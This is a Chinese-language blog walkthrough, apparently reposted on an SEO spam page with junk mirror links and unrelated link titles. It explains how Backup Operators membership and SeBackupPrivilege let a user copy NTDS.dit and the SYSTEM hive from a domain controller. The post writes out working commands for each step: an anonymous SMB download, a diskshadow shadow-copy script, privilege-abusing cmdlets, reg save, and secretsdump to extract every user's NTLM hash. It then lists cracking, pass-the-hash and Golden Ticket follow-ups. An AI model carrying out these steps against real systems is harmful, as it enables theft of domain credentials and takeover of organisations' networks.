当前位置: 首页 > wzjs >正文

wordpress修改主题插件seo移动网站页面怎么做

wordpress修改主题插件,seo移动网站页面怎么做,如何做软件app,兼职网站开发一个月攻击目的: 从域控获取 NTDS.dit(域用户凭据数据库) SYSTEM(包含加密密钥) ➡ 提取域用户 NTLM 哈希 ➡ 离线破解 or 横向移动 or Pass-the-Hash 攻击步骤 - 获取文件副本,NTDS.dit即存储 Active Directo…

攻击目的:

从域控获取 NTDS.dit(域用户凭据数据库)+ SYSTEM(包含加密密钥) ➡ 提取域用户 NTLM 哈希 ➡ 离线破解 or 横向移动 or Pass-the-Hash

攻击步骤

- 获取文件副本,`NTDS.dit`即存储 Active Directory 用户凭据的数据库。
- 接下来,我们将获取 SYSTEM hive 文件,其中包含解密 NTDS.dit 所必需的系统启动密钥
- 使用 Impacket 的 secretsdump 脚本从 NTDS.dit 中提取域中所有用户的 NTLM 哈希

一、什么是 SeBackupPrivilege 权限?

允许用户绕过文件或目录的权限(ACL)来读取文件内容,用于“备份”目的。

简单理解:

1、正常用户不能访问 C:\Windows\NTDS\ntds.dit ——系统会拒绝访问。
2、但拥有 SeBackupPrivilege 的用户,可以绕过这个限制读取文件内容(只要你用的是“备份方式”的工具,如 reg save, robocopy, ntdsutil, diskshadow)。
3、⚠️ SeBackupPrivilege 本身不会默认启用,要配合特定命令才能发挥作用。

二、什么是 Backup Operators 组?


Windows 本地组之一

权限说明:

1、成员默认拥有 SeBackupPrivilege 和 SeRestorePrivilege。
2、不需要是管理员,就可以使用:reg saventdsutildiskshadowrobocopy(使用 Backup 模式)

关系图:你可以这样理解

Backup Operators Group⬇(默认拥有)SeBackupPrivilege 权限⬇可读取系统保护文件(如 SYSTEM, NTDS.dit)⬇配合卷影副本技术⬇获取域控哈希⬇离线破解 or 横向移动 or 票据伪造

怎么判断当前用户是否具备这些条件?

判断权限:

whoami /priv
SeBackupPrivilege    Enabled    Back up files and directories

判断用户组:

whoami /groups
Backup Operators 	......

三、适用场景:

条件是否必须说明
当前机器是 域控(DC)✅ 必须NTDS.dit 只存在于域控
当前用户有 SeBackupPrivilege✅ 几乎必需可绕过权限读取系统文件
属于 Backup Operators 组✅ 推荐自动拥有 SeBackupPrivilege
可用 卷影副本 VSS✅ 必须复制 SYSTEM 和 ntds.dit
能访问SMB共享路径(匿名或已登录)✅(共享打法)SMB匿名共享备份目录可直接下载

四、SMB 匿名共享打法

1、如果发现匿名 SMB 共享开放(如 \dc01\backup),且其中包含:

ntds.dit
system.hive

2、直接下载使用:

smbclient \\\\<ip>\\backup -N
# -N 表示匿名连接
get ntds.dit
get system.hive

3、然后使用 secretsdump 提取:

python ./secretsdump.py -ntds ntds.dit -system system.hive local

五、卷影副本打法(非 SMB 共享)

1、下载这两个文件,并上传

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug# SeBackupPrivilegeCmdLets.dll
# SeBackupPrivilegeUtils.dll

2、导入模块

Import-Module ./SeBackupPrivilegeUtils.dll
Import-Module ./SeBackupPrivilegeCmdLets.dll

3、创建卷影副本

vim vss.dshset context persistent nowriters
add volume c: alias new1
create
expose %new1% z:

4、执行格式转行并上传到可写路径里(没有可以自己创建)

unix2dos vss.dsh
upload vss.dsh 

5、执行目标文件

diskshadow /s vss.dsh

6、获取 ntds.dit 和 SYSTEM hive

将 SYSTEM hive 和 ntds.dit 导出,保存在主机上

Copy-FileSeBackupPrivilege z:\windows\ntds\ntds.dit .\ntds.dit		# 将z盘的ntds.dit保存在当前ntds.dit
reg save HKLM\SYSTEM C:\Users\svc_backup\Documents\tmp\system.hive	# 将C盘的system.hive保存在当前目录

下载后离线破解

7、secretsdump 提取哈希

python ./secretsdump.py -ntds ntds.dit -system system.hive local

六、取成功后可用操作

操作工具说明
离线破解密码hashcatjohn尝试爆破弱口令
横向移动psexec.py, wmiexec.py利用管理员账号的哈希
域控完全控制域管账号可进一步滥用 AD 权限(如 Golden Ticket)

文章转载自:

http://ehpNPZSQ.hqLLx.cn
http://kE6gVNH0.hqLLx.cn
http://65kwEHHS.hqLLx.cn
http://tOmx1ajR.hqLLx.cn
http://GBSSgL8c.hqLLx.cn
http://yhxVBpIg.hqLLx.cn
http://UQI8ffAh.hqLLx.cn
http://7sxw7V3a.hqLLx.cn
http://pf9vu1US.hqLLx.cn
http://DyR0rLp9.hqLLx.cn
http://QYhvOewG.hqLLx.cn
http://hyKBbDud.hqLLx.cn
http://hilaYc2j.hqLLx.cn
http://FKMumqFM.hqLLx.cn
http://vfJraKiE.hqLLx.cn
http://RB8lY9I1.hqLLx.cn
http://0obbzB54.hqLLx.cn
http://gC6FutYw.hqLLx.cn
http://IrZ6FGDQ.hqLLx.cn
http://xpyesXhG.hqLLx.cn
http://kh28aoBa.hqLLx.cn
http://HmOsZCiu.hqLLx.cn
http://ilqnNLMI.hqLLx.cn
http://EyYJpx8i.hqLLx.cn
http://MxIIa7C6.hqLLx.cn
http://6iVNHUgu.hqLLx.cn
http://9BzlsNrG.hqLLx.cn
http://veLYPKV2.hqLLx.cn
http://5CBfruls.hqLLx.cn
http://HNT24vwz.hqLLx.cn
http://www.dtcms.com/wzjs/693927.html

相关文章:

  • 网站制作素材网站如何让客户做网站
  • 网站建设的流程视频华为官方网站
  • 织梦模板怎么验证网站恩施建设网站
  • 陕西省城乡建设厅的网站wordpress 新浪微博图床
  • 北京建设教育协会官方网站不用下载就可以登录微信
  • 福建网站建设网百度竞价排名服务
  • 潍坊的网站建设阿里云网站实名认证
  • 小程序 企业网站兰州做网站一咨询兰州做网站公司
  • 网页开发网站装修找设计师要多少钱
  • php自助建站程序泌阳网站建设
  • 丽水网站建设公司莱芜吧贴吧 百度
  • 完全网络营销网站wordpress误修改
  • 最好的开发网站建设价格上海租房网个人房源
  • 查网站空间商线上营销技巧和营销方法
  • 网站开发5人小组分工电商网站设计理念
  • 在哪个网站上做兼职比较好河北建设工程招标网
  • 刘涛给孩子网站做的广告jsp语言做网站
  • 磁贴式网站模板软文代发平台
  • 学校网站建设评估diy个性定制
  • 广州网站建设优化wordpress 邀请机制
  • 做电影网站不放国内主机怎样自己建一个网站
  • 优秀甜品网站好看的企业网站模板
  • wordpress 图片轮播上海网页优化软件
  • 一个微信网站多少钱jexus wordpress
  • 舟山建设网站公司苏州网站建设开发
  • 郑州做商城网站wordpress-seo
  • 做网站排行在网站中搜索关键字
  • 手机怎么做自己的网站中国航空集团建设开发有限公司网站
  • 济南制作网站的公司用fullpage做的网站
  • 做房产买卖哪些网站可以获客拓客软件